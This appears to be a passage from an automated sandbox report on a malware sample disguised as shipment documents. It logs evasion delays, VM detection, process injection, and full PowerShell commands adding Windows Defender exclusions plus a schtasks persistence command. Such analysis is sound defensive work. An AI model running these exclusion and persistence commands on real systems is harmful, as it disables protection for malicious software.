                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -596280s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -596172s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -596062s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -595953s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -595844s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -595719s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -595609s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -595500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -595390s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -595281s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -595172s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -595062s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -594952s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -594843s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -594734s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -594625s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -594496s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -594221s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -594073s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 599805Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 599687Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 599578Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 599469Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 599359Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 599250Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 599140Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 599024Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598906Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598796Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598687Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598578Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598468Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598359Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598250Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598126Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598000Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 597890Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 597781Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 597669Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 597533Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 597387Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 597275Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 597154Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596718Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596500Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596390Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596281Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596172Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596062Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595953Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595843Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595734Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595625Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595515Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595406Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595297Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595187Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595068Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 594624Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 594406Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 599890
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 599779
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 599672
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 599562
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 599453
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 599292
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 599175
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 599054
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 598836
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 598719
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 598607
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 598500
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 598390
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 598281
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 598171
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 598062
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597953
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597843
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597734
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597624
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597515
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597406
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597296
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597187
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597078
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596968
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596859
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596740
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596609
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596500
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596390
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596280
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596172
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596062
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595953
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595844
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595719
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595609
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595500
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595390
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595281
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595172
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595062
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 594952
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 594843
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 594734
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 594625
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 594496
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 594221
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 594073
                Source: rShipmentDocuments.exe, 00000009.00000002.4135329351.0000000000E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
                Source: ZOlmYtPdlO.exe, 0000000A.00000002.1773124497.00000000080CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\T
                Source: ZOlmYtPdlO.exe, 0000000A.00000002.1764660892.00000000009D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
                Source: ZOlmYtPdlO.exe, 00000010.00000002.4136109973.0000000001429000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F9328 LdrInitializeThunk,9_2_068F9328
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeMemory written: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Users\user\Desktop\rShipmentDocuments.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
